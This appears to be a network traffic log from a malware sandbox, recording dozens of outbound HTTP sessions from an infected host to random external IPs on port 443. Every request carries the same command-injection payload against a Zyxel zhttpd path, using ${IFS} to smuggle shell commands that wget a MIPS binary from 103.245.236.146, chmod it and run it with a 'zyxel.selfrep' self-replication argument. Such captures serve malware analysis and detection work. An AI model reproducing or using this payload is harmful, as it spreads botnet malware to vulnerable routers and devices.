                                                Jan 29, 2024 07:07:00.819205046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                203192.168.2.2336176194.182.78.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:00.819243908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                204192.168.2.234901845.116.160.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:00.819327116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                205192.168.2.2336478133.169.211.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:01.822627068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                206192.168.2.2333006194.152.236.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:01.822659016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                207192.168.2.2343460167.180.234.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:01.822675943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                208192.168.2.234764087.243.51.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:01.822705984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                209192.168.2.2353074220.29.131.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:01.822724104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                210192.168.2.235615623.194.237.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:01.822845936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                211192.168.2.233875892.36.122.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:01.822880030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                212192.168.2.233948048.218.168.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:02.827292919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                213192.168.2.23480288.141.131.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:02.827351093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                214192.168.2.2336374207.190.211.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:02.827383995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                215192.168.2.2352286203.38.201.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:02.827486038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                216192.168.2.2353712177.146.93.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:02.827522039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                217192.168.2.2341134115.212.170.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:02.827564001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                218192.168.2.2350890165.11.192.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.830688000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                219192.168.2.236024846.201.91.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.830733061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                220192.168.2.235707287.31.1.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.830760956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                221192.168.2.234953873.80.37.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.830832958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                222192.168.2.235468695.178.96.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.830851078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                223192.168.2.2334354145.42.168.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.830904007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                224192.168.2.2339548150.151.101.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.830928087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                225192.168.2.2332858150.202.214.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.830954075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                226192.168.2.233620471.164.137.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.830991983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                227192.168.2.2360870151.176.96.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.831011057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                228192.168.2.234876868.16.206.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.831046104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                229192.168.2.235130468.13.221.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.831054926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                230192.168.2.2351704217.28.68.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.831115961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                231192.168.2.2334258129.224.68.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.831139088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                232192.168.2.235332286.146.71.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.831150055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                233192.168.2.2335390159.183.31.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.831238985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                234192.168.2.23384204.207.182.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.831259012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                235192.168.2.235751269.43.25.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.831300020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                236192.168.2.2334706193.68.239.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.831332922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                237192.168.2.2342752113.209.2.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.831350088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                238192.168.2.234467863.102.220.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.831397057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                239192.168.2.2338808197.230.12.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.831432104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                240192.168.2.234596676.208.119.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.831753016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                241192.168.2.2343180216.135.123.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.831799030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                242192.168.2.2353578207.220.135.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:03.831819057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                243192.168.2.2351294104.146.16.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:04.834160089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                244192.168.2.2355742161.220.56.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:04.834194899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                245192.168.2.23368229.173.250.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:04.834264994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                246192.168.2.233672888.60.143.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:04.834373951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                247192.168.2.2360628117.147.39.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:04.834378004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                248192.168.2.2336380200.240.160.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:05.837470055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                249192.168.2.2339462222.198.207.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:05.837531090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                250192.168.2.233986870.97.226.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:05.837531090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                251192.168.2.23451801.35.120.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:05.837572098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                252192.168.2.2351634143.134.16.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:05.837614059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                253192.168.2.234541439.153.181.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:05.837619066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                254192.168.2.234787237.93.78.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:05.837658882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                255192.168.2.233515279.226.58.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:05.837696075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                256192.168.2.23513582.51.206.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:05.837778091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                257192.168.2.233932639.122.255.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:05.837842941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                258192.168.2.2339690213.160.119.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:05.837877989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                259192.168.2.234751818.166.100.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:06.841365099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                260192.168.2.233336445.239.90.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:06.841425896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                261192.168.2.234086631.170.57.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:06.841453075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                262192.168.2.2341872166.87.44.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:06.841506958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                263192.168.2.2333300170.168.193.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:06.841664076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                264192.168.2.234223039.118.16.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:07.845180035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                265192.168.2.2346406151.87.20.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:07.845206022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                266192.168.2.2340670115.94.72.5443
                                                TimestampBytes transferredDirectionData
